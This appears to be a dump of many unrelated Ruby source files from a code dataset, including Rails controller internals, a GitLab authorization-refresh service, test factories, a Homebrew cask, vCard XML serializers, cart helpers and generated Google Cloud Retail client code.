# An action may contain only a single render or a single redirect. Attempting to try to do either again will result in a DoubleRenderError:
#
# def do_something
# redirect_to action: "elsewhere"
# render action: "overthere" # raises DoubleRenderError
# end
#
# If you need to redirect on the condition of something, then be sure to add "and return" to halt execution.
#
# def do_something
# redirect_to(action: "elsewhere") and return if monkeys.nil?
# render action: "overthere" # won't be called if monkeys is nil
# end
#
class Base < Metal
abstract!
# We document the request and response methods here because albeit they are
# implemented in ActionController::Metal, the type of the returned objects
# is unknown at that level.
##
# :method: request
#
# Returns an ActionDispatch::Request instance that represents the
# current request.
##
# :method: response
#
# Returns an ActionDispatch::Response that represents the current
# response.
# Shortcut helper that returns all the modules included in
# ActionController::Base except the ones passed as arguments:
#
# class MyBaseController < ActionController::Metal
# ActionController::Base.without_modules(:ParamsWrapper, :Streaming).each do |left|
# include left
# end
# end
#
# This gives better control over what you want to exclude and makes it
# easier to create a bare controller class, instead of listing the modules
# required manually.
def self.without_modules(*modules)
modules = modules.map do |m|
m.is_a?(Symbol) ? ActionController.const_get(m) : m
end
MODULES - modules
end
MODULES = [
AbstractController::Rendering,
AbstractController::Translation,
AbstractController::AssetPaths,
Helpers,
UrlFor,
Redirecting,
ActionView::Layouts,
Rendering,
Renderers::All,
ConditionalGet,
EtagWithTemplateDigest,
EtagWithFlash,
Caching,
MimeResponds,
ImplicitRender,
StrongParameters,
ParameterEncoding,
Cookies,
Flash,
FormBuilder,
RequestForgeryProtection,
ContentSecurityPolicy,
ForceSSL,
Streaming,
DataStreaming,
HttpAuthentication::Basic::ControllerMethods,
HttpAuthentication::Digest::ControllerMethods,
HttpAuthentication::Token::ControllerMethods,
DefaultHeaders,
# Before callbacks should also be executed as early as possible, so
# also include them at the bottom.
AbstractController::Callbacks,
# Append rescue at the bottom to wrap as much as possible.
Rescue,
# Add instrumentations hooks at the bottom, to ensure they instrument
# all the methods properly.
Instrumentation,
# Params wrapper should come before instrumentation so they are
# properly showed in logs
ParamsWrapper
]
MODULES.each do |mod|
include mod
end
setup_renderer!
# Define some internal variables that should not be propagated to the view.
PROTECTED_IVARS = AbstractController::Rendering::DEFAULT_PROTECTED_INSTANCE_VARIABLES + %i(
@_params @_response @_request @_config @_url_options @_action_has_layout @_view_context_class
@_view_renderer @_lookup_context @_routes @_view_runtime @_db_runtime @_helper_proxy
)
def _protected_ivars # :nodoc:
PROTECTED_IVARS
end
ActiveSupport.run_load_hooks(:action_controller_base, self)
ActiveSupport.run_load_hooks(:action_controller, self)
end
end
| 41.227941 | 141 | 0.699929 |
1850fa9747df54d5a5bf79959c57fb5b89454db5 | 3,766 | # frozen_string_literal: true
module Users
# Service for refreshing the authorized projects of a user.
#
# This particular service class can not be used to update data for the same
# user concurrently. Doing so could lead to an incorrect state. To ensure this
# doesn't happen a caller must synchronize access (e.g. using
# `Gitlab::ExclusiveLease`).
#
# Usage:
#
# user = User.find_by(username: 'alice')
# service = Users::RefreshAuthorizedProjectsService.new(some_user)
# service.execute
class RefreshAuthorizedProjectsService
attr_reader :user, :source
LEASE_TIMEOUT = 1.minute.to_i
# user - The User for which to refresh the authorized projects.
def initialize(user, source: nil, incorrect_auth_found_callback: nil, missing_auth_found_callback: nil)
@user = user
@source = source
@incorrect_auth_found_callback = incorrect_auth_found_callback
@missing_auth_found_callback = missing_auth_found_callback
end
def execute
lease_key = "refresh_authorized_projects:#{user.id}"
lease = Gitlab::ExclusiveLease.new(lease_key, timeout: LEASE_TIMEOUT)
until uuid = lease.try_obtain
# Keep trying until we obtain the lease. If we don't do so we may end up
# not updating the list of authorized projects properly. To prevent
# hammering Redis too much we'll wait for a bit between retries.
sleep(0.1)
end
begin
# We need an up to date User object that has access to all relations that
# may have been created earlier. The only way to ensure this is to reload
# the User object.
user.reset
execute_without_lease
ensure
Gitlab::ExclusiveLease.cancel(lease_key, uuid)
end
end
# This method returns the updated User object.
def execute_without_lease
remove, add = AuthorizedProjectUpdate::FindRecordsDueForRefreshService.new(
user,
source: source,
incorrect_auth_found_callback: incorrect_auth_found_callback,
missing_auth_found_callback: missing_auth_found_callback
).execute
update_authorizations(remove, add)
end
# Updates the list of authorizations for the current user.
#
# remove - The IDs of the authorization rows to remove.
# add - Rows to insert in the form `[user id, project id, access level]`
def update_authorizations(remove = [], add = [])
log_refresh_details(remove, add)
User.transaction do
user.remove_project_authorizations(remove) unless remove.empty?
ProjectAuthorization.insert_authorizations(add) unless add.empty?
end
# Since we batch insert authorization rows, Rails' associations may get
# out of sync. As such we force a reload of the User object.
user.reset
end
private
attr_reader :incorrect_auth_found_callback, :missing_auth_found_callback
def log_refresh_details(remove, add)
Gitlab::AppJsonLogger.info(event: 'authorized_projects_refresh',
user_id: user.id,
'authorized_projects_refresh.source': source,
'authorized_projects_refresh.rows_deleted_count': remove.length,
'authorized_projects_refresh.rows_added_count': add.length,
# most often there's only a few entries in remove and add, but limit it to the first 5
# entries to avoid flooding the logs
'authorized_projects_refresh.rows_deleted_slice': remove.first(5),
'authorized_projects_refresh.rows_added_slice': add.first(5))
end
end
end
| 38.824742 | 119 | 0.669145 |
7a67976b8378124568ca935f24fbb128677651e5 | 2,184 | require "name_change_o_chart/version"
module NameChangeOChart
def convert(name)
parts = name.to_s.downcase.split
start = parts.first.to_s
ending = parts.last.to_s
first = start[0]
second = ending[0]
third = ending[-1]
%{#{first_of_first(first)} #{first_of_last(second)}#{last_of_last(third)}}
end
def first_of_first(letter)
{"a" => "stinky",
"b" => "lumpy",
"c" => "buttercup",
"d" => "gidget",
"e" => "crusty",
"f" => "greasy",
"g" => "fluffy",
"h" => "cheeseball",
"i" => "chim-chim",
"j" => "poopsie",
"k" => "flunky",
"l" => "booger",
"m" => "pinky",
"n" => "zippy",
"o" => "goober",
"p" => "doofus",
"q" => "slimy",
"r" => "loopy",
"s" => "snotty",
"t" => "falafel",
"u" => "dorkey",
"v" => "squeezit",
"w" => "oprah",
"x" => "skipper",
"y" => "dinky",
"z" => "zsa-zsa"}.fetch(letter)
end
def first_of_last(letter)
{"a" => "diaper",
"b" => "toilet",
"c" => "giggle",
"d" => "bubble",
"e" => "girdle",
"f" => "barf",
"g" => "lizard",
"h" => "waffle",
"i" => "cootie",
"j" => "monkey",
"k" => "potty",
"l" => "liver",
"m" => "banana",
"n" => "rhino",
"o" => "burger",
"p" => "hamster",
"q" => "toad",
"r" => "gizzard",
"s" => "pizza",
"t" => "gerbil",
"u" => "chicken",
"v" => "pickle",
"w" => "chuckle",
"x" => "tofu",
"y" => "gorilla",
"z" => "stinker"}.fetch(letter)
end
def last_of_last(letter)
{"a" => "head",
"b" => "mouth",
"c" => "face",
"d" => "nose",
"e" => "tush",
"f" => "breath",
"g" => "pants",
"h" => "shorts",
"i" => "lips",
"j" => "honker",
"k" => "butt",
"l" => "brain",
"m" => "tushie",
"n" => "chunks",
"o" => "hiney",
"p" => "biscuits",
"q" => "toes",
"r" => "buns",
"s" => "fanny",
"t" => "sniffer",
"u" => "sprinkles",
"v" => "kisser",
"w" => "squirt",
"x" => "humperdinck",
"y" => "brains",
"z" => "juice"}.fetch(letter)
end
module_function *self.instance_methods(false)
end
| 20.603774 | 78 | 0.419414 |
39781c7037b681a4cc44599d95d63d85f2dd495b | 245 | FactoryBot.define do
factory :user, class: User do
name { Faker::Name.first_name }
last_name { Faker::Name.last_name }
sex { [Commons::Concerns::Attributes::Sex::FEMALE, Commons::Concerns::Attributes::Sex::MALE].sample }
end
end
| 30.625 | 105 | 0.697959 |
87449c651f0b3625b51e5e4bbfc75c3b10f8b4cb | 181 | class UserMenu::SignedInComponent < ApplicationComponent
attr_reader :user
def initialize(user)
@user = user
end
def business?
user.business&.persisted?
end
end
| 15.083333 | 56 | 0.723757 |
e90f0ba730e84fb4da9754b9e7339eb021d4bcb2 | 500 | module ActiveRecord
module ConnectionAdapters
module Sqlserver
module Showplan
class PrinterXml
def initialize(result)
@result = result
end
def pp
xml = @result.rows.first.first
if defined?(Nokogiri)
Nokogiri::XML(xml).to_xml :indent => 2, :encoding => 'UTF-8'
else
xml
end
end
end
end
end
end
end
| 19.230769 | 74 | 0.464 |
ed9a9c74747540a684a0b14115bfbc5de16e316b | 291 | require 'rails_helper'
RSpec.describe "inflows/edit", type: :view do
before(:each) do
@inflow = assign(:inflow, Inflow.create!())
end
it "renders the edit inflow form" do
render
assert_select "form[action=?][method=?]", inflow_path(@inflow), "post" do
end
end
end
| 19.4 | 77 | 0.66323 |
79a2466c1d8aa9fc49f746735e919585b8a45248 | 315 | unless defined?(Devise)
require 'devise'
end
module DeviseBearerToken
end
Devise.add_module :bearer_token_authenticatable, model: true, strategy: true
Devise.setup do |config|
config.bearer_token_fields = [ :access_token, :token_type, :client, :expiry, :uid ]
config.bearer_token_strategy = :headers
end
| 22.5 | 85 | 0.774603 |
b9c01f44d7d6419767575b987368e9e56e281daf | 1,459 | module PiiSafeSchema
class PiiColumn
extend PiiSafeSchema::Annotations
attr_reader :table, :column, :suggestion
def initialize(table:, column:, suggestion:)
@table = table.to_sym
@column = column
@suggestion = suggestion
end
class << self
def all
find_and_create
end
def from_column_name(table:, column:, suggestion:)
activerecord_column = connection.columns(table.to_s).find { |c| c.name == column.to_s }
unless activerecord_column
raise InvalidColumnError, "column \"#{column}\" does not exist for table \"#{table}\""
end
new(table: table, column: activerecord_column, suggestion: suggestion)
end
private
def find_and_create
relevant_tables.map do |table|
connection.columns(table).map do |column|
next if ignored_column?(table, column)
rec = recommended_comment(column)
rec ? new(table: table, column: column, suggestion: rec) : nil
end.compact
end.compact.flatten
end
def connection
ActiveRecord::Base.connection
end
def relevant_tables
connection.tables - PiiSafeSchema.configuration.ignore_tables
end
def ignored_column?(table, column)
PiiSafeSchema.configuration.
ignore_columns[table.to_sym]&.
include?(column.name.to_sym)
end
end
end
end
| 26.053571 | 96 | 0.627142 |
269c4f303f0d6d7eca0677bc7129f04436c05d24 | 3,840 | module EffectiveCartsHelper
# TODO: Consider unique
def current_cart(for_user = nil)
@cart ||= (
user = for_user || (current_user rescue nil) # rescue protects me against Devise not being installed
if user.present?
user_cart = Effective::Cart.where(user: user).first_or_create
# Merge session cart into user cart.
if session[:cart].present?
session_cart = Effective::Cart.where(user: nil).where(id: session[:cart]).first
if session_cart
session_cart.cart_items.each { |i| user_cart.add(i.purchasable, quantity: i.quantity, unique: i.unique) }
session_cart.destroy
end
session[:cart] = nil
end
user_cart
elsif session[:cart].present?
Effective::Cart.where(user_id: nil).where(id: session[:cart]).first_or_create
else
cart = Effective::Cart.create!
session[:cart] = cart.id
cart
end
)
end
def link_to_current_cart(opts = {})
options = {
label: 'My Cart',
id: 'current_cart',
rel: :nofollow,
class: 'btn btn-default'
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-current-cart')
link_to (current_cart.size == 0 ? label : "#{label} (#{current_cart.size})"), effective_orders.cart_path, options
end
def link_to_add_to_cart(purchasable, opts = {})
raise 'expecting an acts_as_purchasable object' unless purchasable.kind_of?(ActsAsPurchasable)
options = {
label: 'Add to Cart',
class: 'btn btn-primary',
rel: :nofollow,
data: {
disable_with: 'Adding...'
}
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-add-to-cart')
link_to(label, effective_orders.add_to_cart_path(purchasable_type: purchasable.class.name, purchasable_id: purchasable.id.to_i), options)
end
def link_to_remove_from_cart(cart_item, opts = {})
raise 'expecting an Effective::CartItem object' unless cart_item.kind_of?(Effective::CartItem)
options = {
label: 'Remove',
class: 'btn btn-primary',
rel: :nofollow,
data: {
confirm: 'Are you sure? This cannot be undone!',
disable_with: 'Removing...'
},
method: :delete
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-remove-from-cart')
link_to(label, effective_orders.remove_from_cart_path(cart_item), options)
end
def link_to_empty_cart(opts = {})
options = {
label: 'Empty Cart',
class: 'btn btn-danger',
rel: :nofollow,
data: {
confirm: 'This will clear your entire cart. Are you sure?',
disable_with: 'Emptying...'
},
method: :delete
}.merge(opts)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-empty-cart')
link_to(label, effective_orders.cart_path, options)
end
def link_to_checkout(opts = {})
options = {
label: 'Checkout',
class: 'btn btn-primary',
rel: :nofollow,
data: {
disable_with: 'Continuing...'
},
}.merge(opts)
order = options.delete(:order)
label = options.delete(:label)
options[:class] = ((options[:class] || '') + ' btn-checkout')
if order.present?
link_to(label, effective_orders.edit_order_path(order), options)
else
link_to(label, effective_orders.new_order_path, options)
end
end
def render_cart(cart = nil)
cart ||= current_cart
render(partial: 'effective/carts/cart', locals: { cart: cart })
end
def render_purchasables(*purchasables)
render(partial: 'effective/orders/order_items', locals: { order: Effective::Order.new(purchasables) })
end
end
| 28.656716 | 141 | 0.623438 |
1abce1777fbdc057ac9bddfb9b11e06c4d9528fb | 669 | # frozen_string_literal: true
require "guard/options"
module Guard
module UI
class Logger
class Config < Guard::Options
DEFAULTS = {
progname: "Guard",
level: :info,
template: ":time - :severity - :message",
time_format: "%H:%M:%S",
flush_seconds: 0,
# Other LumberJack device-specific options
# max_size: "5M",
# buffer_size: 0,
# additional_lines: nil,
}.freeze
def initialize(options = {})
super(options, DEFAULTS)
end
def level=(value)
self["level"] = value
end
end
end
end
end
| 20.272727 | 52 | 0.523169 |
e2ec663a909af088e61fe462d5ccc596cf333037 | 5,074 | # frozen_string_literal: true
require "simplecov"
SimpleCov.start do
minimum_coverage 100
end
require "with_model"
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
config.extend WithModel
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# # This allows you to limit a spec run to individual examples or groups
# # you care about by tagging them with `:focus` metadata. When nothing
# # is tagged with `:focus`, all examples get run. RSpec also provides
# # aliases for `it`, `describe`, and `context` that include `:focus`
# # metadata: `fit`, `fdescribe` and `fcontext`, respectively.
# config.filter_run_when_matching :focus
#
# # Allows RSpec to persist some state between runs in order to support
# # the `--only-failures` and `--next-failure` CLI options. We recommend
# # you configure your source control system to ignore this file.
# config.example_status_persistence_file_path = "spec/examples.txt"
#
# # Limits the available syntax to the non-monkey patched syntax that is
# # recommended. For more details, see:
# # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
# config.disable_monkey_patching!
#
# # Many RSpec users commonly either run the entire suite or an individual
# # file, and it's useful to allow more verbose output when running an
# # individual spec file.
# if config.files_to_run.one?
# # Use the documentation formatter for detailed output,
# # unless a formatter has already been configured
# # (e.g. via a command-line flag).
# config.default_formatter = "doc"
# end
#
# # Print the 10 slowest examples and example groups at the
# # end of the spec run, to help surface which specs are running
# # particularly slow.
# config.profile_examples = 10
#
# # Run specs in random order to surface order dependencies. If you find an
# # order dependency and want to debug it, you can fix the order by providing
# # the seed, which is printed after each run.
# # --seed 1234
# config.order = :random
#
# # Seed global randomization in this process using the `--seed` CLI option.
# # Setting this allows you to use `--seed` to deterministically reproduce
# # test failures related to randomization by passing the same `--seed` value
# # as the one that triggered the failure.
# Kernel.srand config.seed
end
| 47.867925 | 96 | 0.719354 |
87c309d747a980eb84f867421c27326b4cb13add | 2,046 | # -*- encoding: utf-8 -*-
# stub: decent_exposure 3.0.4 ruby lib
Gem::Specification.new do |s|
s.name = "decent_exposure".freeze
s.version = "3.0.4"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Pavel Pravosud".freeze, "Stephen Caudill".freeze]
s.date = "2021-01-12"
s.description = "\n DecentExposure helps you program to an interface, rather than an\n implementation in your Rails controllers. The fact of the matter is that\n sharing state via instance variables in controllers promotes close coupling\n with views. DecentExposure gives you a declarative manner of exposing an\n interface to the state that controllers contain and thereby decreasing\n coupling and improving your testability and overall design.\n ".freeze
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/hashrocket/decent_exposure".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "3.2.13".freeze
s.summary = "A helper for creating declarative interfaces in controllers".freeze
s.installed_by_version = "3.2.13" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<activesupport>.freeze, [">= 4.0"])
s.add_development_dependency(%q<railties>.freeze, [">= 4.0"])
s.add_development_dependency(%q<actionmailer>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec-rails>.freeze, ["~> 3.0"])
s.add_development_dependency(%q<standard>.freeze, [">= 0"])
else
s.add_dependency(%q<activesupport>.freeze, [">= 4.0"])
s.add_dependency(%q<railties>.freeze, [">= 4.0"])
s.add_dependency(%q<actionmailer>.freeze, [">= 0"])
s.add_dependency(%q<rspec-rails>.freeze, ["~> 3.0"])
s.add_dependency(%q<standard>.freeze, [">= 0"])
end
end
| 51.15 | 481 | 0.711144 |
111bcb9e7675c9c76942ee594886fb96c563c897 | 751 | cask "dynobase" do
arch = Hardware::CPU.intel? ? "" : "-arm64"
version "1.8.1"
if Hardware::CPU.intel?
sha256 "6140f786e798668d7f63c12db5bafbad47d1be18d76b64a01ae0c857db3459b6"
else
sha256 "78c62b7eac57282d4afc2e7afe6a28213595a6dcb542b96d0f393a4d2a2c60eb"
end
url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}#{arch}.dmg",
verified: "github.com/Dynobase/dynobase/"
name "Dynobase"
desc "GUI Client for DynamoDB"
homepage "https://dynobase.dev/"
livecheck do
url :url
strategy :github_latest
end
app "Dynobase.app"
zap trash: [
"~/Library/Application Support/dynobase",
"~/Library/Saved Application State/com.rwilinski.dynobase.savedState",
]
end
| 25.033333 | 105 | 0.721704 |
4a8f413ad2312dcdba56892b1a249ba0f72cb5be | 3,589 | module Virginity
class BaseField < ContentLine
def params_to_xml!(params, builder)
builder.params(:type => "array") do
params.each do |p|
builder.tag!(p.key, p.value, :type => "string")
end
end
end
def extra_fields_to_xml(fields, builder)
fields.each_pair { |k,v| builder.tag!(k, v) } unless fields.nil?
end
end
class BaseField < ContentLine
def params_to_xml
s = ""
unless params.empty?
s << "<params>"
params.each do |p|
s << xml_element(p.key, p.value)
end
s << "</params>"
end
s
end
# def params_to_xml
# return "" if params.empty?
# "<params>#{params.map {|p| xml_element(p.key, p.value) }.join}</params>"
# end
def value_to_xml
xml_element(@value, @value.strip)
end
def to_xml
s = "<#{name.downcase}>"
s << xml_element("group", group) unless group.nil?
s << params_to_xml
s << value_to_xml
s << "</#{name.downcase}>"
end
end
class Email < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.email(:index => api_id ) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
xml.address address
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Tel < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.telephone(:index => api_id ) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
xml.number number
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Url < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.url(:index => api_id) do
xml.id api_id, :type => "string"
xml.text text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Adr < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.address(:index => api_id) do
xml.id api_id, :type => "string"
# params_to_xml!(params, xml)
components.each do |component|
xml.tag!(component, send(component))
end
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Org < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.organisation :index => api_id do
xml.id api_id, :type => "string"
xml.name orgname
xml.unit1 unit1
xml.unit2 unit2
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class Impp < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.impp(:index => api_id ) do
xml.id api_id, :type => "string"
xml.scheme scheme
xml.address address
xml.value text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
class TextField < BaseField
def to_xml(options = {})
xml = options[:builder] || Builder::XmlMarkup.new(options)
xml.note(:index => api_id) do
xml.id api_id, :type => "string"
xml.text text
extra_fields_to_xml(options[:include], xml)
end
xml.target!
end
end
end
| 23.611842 | 80 | 0.575648 |
18ed8e42f9c137dd3b039dab1d363abf520f8606 | 9,437 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# Require this file early so that the version constant gets defined before
# requiring "google/cloud". This is because google-cloud-core will load the
# entrypoint (gem name) file, which in turn re-requires this file (hence
# causing a require cycle) unless the version constant is already defined.
require "google/cloud/retail/version"
require "googleauth"
gem "google-cloud-core"
require "google/cloud" unless defined? ::Google::Cloud.new
require "google/cloud/config"
# Set the default configuration
::Google::Cloud.configure.add_config! :retail do |config|
config.add_field! :endpoint, "retail.googleapis.com", match: ::String
config.add_field! :credentials, nil, match: [::String, ::Hash, ::Google::Auth::Credentials]
config.add_field! :scope, nil, match: [::Array, ::String]
config.add_field! :lib_name, nil, match: ::String
config.add_field! :lib_version, nil, match: ::String
config.add_field! :interceptors, nil, match: ::Array
config.add_field! :timeout, nil, match: ::Numeric
config.add_field! :metadata, nil, match: ::Hash
config.add_field! :retry_policy, nil, match: [::Hash, ::Proc]
config.add_field! :quota_project, nil, match: ::String
end
module Google
module Cloud
module Retail
##
# Create a new client object for CatalogService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::CatalogService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/CatalogService/Client.html)
# for version V2 of the API.
# However, you can specify specify a different API version by passing it in the
# `version` parameter. If the CatalogService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About CatalogService
#
# Service for managing catalog configuration.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [CatalogService::Client] A client object for the specified version.
#
def self.catalog_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:CatalogService).const_get(:Client).new(&block)
end
##
# Create a new client object for PredictionService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::PredictionService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/PredictionService/Client.html)
# for version V2 of the API.
# However, you can specify specify a different API version by passing it in the
# `version` parameter. If the PredictionService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About PredictionService
#
# Service for making recommendation prediction.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [PredictionService::Client] A client object for the specified version.
#
def self.prediction_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:PredictionService).const_get(:Client).new(&block)
end
##
# Create a new client object for ProductService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::ProductService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/ProductService/Client.html)
# for version V2 of the API.
# However, you can specify specify a different API version by passing it in the
# `version` parameter. If the ProductService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About ProductService
#
# Service for ingesting Product information
# of the customer's website.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [ProductService::Client] A client object for the specified version.
#
def self.product_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:ProductService).const_get(:Client).new(&block)
end
##
# Create a new client object for UserEventService.
#
# By default, this returns an instance of
# [Google::Cloud::Retail::V2::UserEventService::Client](https://googleapis.dev/ruby/google-cloud-retail-v2/latest/Google/Cloud/Retail/V2/UserEventService/Client.html)
# for version V2 of the API.
# However, you can specify specify a different API version by passing it in the
# `version` parameter. If the UserEventService service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About UserEventService
#
# Service for ingesting end user actions on the customer website.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v2`.
# @return [UserEventService::Client] A client object for the specified version.
#
def self.user_event_service version: :v2, &block
require "google/cloud/retail/#{version.to_s.downcase}"
package_name = Google::Cloud::Retail
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::Retail.const_get package_name
package_module.const_get(:UserEventService).const_get(:Client).new(&block)
end
##
# Configure the google-cloud-retail library.
#
# The following configuration parameters are supported:
#
# * `credentials` (*type:* `String, Hash, Google::Auth::Credentials`) -
# The path to the keyfile as a String, the contents of the keyfile as a
# Hash, or a Google::Auth::Credentials object.
# * `lib_name` (*type:* `String`) -
# The library name as recorded in instrumentation and logging.
# * `lib_version` (*type:* `String`) -
# The library version as recorded in instrumentation and logging.
# * `interceptors` (*type:* `Array<GRPC::ClientInterceptor>`) -
# An array of interceptors that are run before calls are executed.
# * `timeout` (*type:* `Numeric`) -
# Default timeout in seconds.
# * `metadata` (*type:* `Hash{Symbol=>String}`) -
# Additional gRPC headers to be sent with the call.
# * `retry_policy` (*type:* `Hash`) -
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) -
# The error codes that should trigger a retry.
#
# @return [::Google::Cloud::Config] The default configuration used by this library
#
def self.configure
yield ::Google::Cloud.configure.retail if block_given?
::Google::Cloud.configure.retail
end
end
end
end
helper_path = ::File.join __dir__, "retail", "helpers.rb"
require "google/cloud/retail/helpers" if ::File.file? helper_path
| 45.589372 | 174 | 0.653915 |
39b63242890d1e54578c9aa07f37eac20bf2268a | 621 | require_relative '../automated_init'
context "Put" do
context "Returns stream position" do
stream_name = Controls::StreamName.example
write_event_1 = Controls::EventData::Write.example
write_event_2 = Controls::EventData::Write.example
position_1 = EventSource::EventStore::HTTP::Put.(write_event_1, stream_name)
position_2 = EventSource::EventStore::HTTP::Put.(write_event_2, stream_name)
test "First write returns position of first event" do
assert position_1 == 0
end
test "Subsequent write returns position of next event" do
assert position_2 == 1
end
end
end
| 28.227273 | 80 | 0.727858 |
e87f6b6ccf5076b32a93577c94453ae2932139da | 516 | # frozen_string_literal: false
FactoryBot.define do
factory :debt_account, class: 'Account' do
user
balance { 3000 }
account_type { 'debt' }
balance_currency { 'CLP' }
quota { 0 }
end
factory :credit_account, class: 'Account' do
user
balance { -500 }
account_type { 'credit' }
balance_currency { 'CLP' }
quota { -1000 }
end
factory :account do
user
balance { 3000 }
account_type { 'common' }
balance_currency { 'CLP' }
quota { 200 }
end
end
| 18.428571 | 46 | 0.612403 |
bb65e2242e732140eb434d726f7cb49691b0ca55 | 234 | class Schedule < ApplicationRecord
has_many :user_schedules
has_many :users, through: :user_schedules
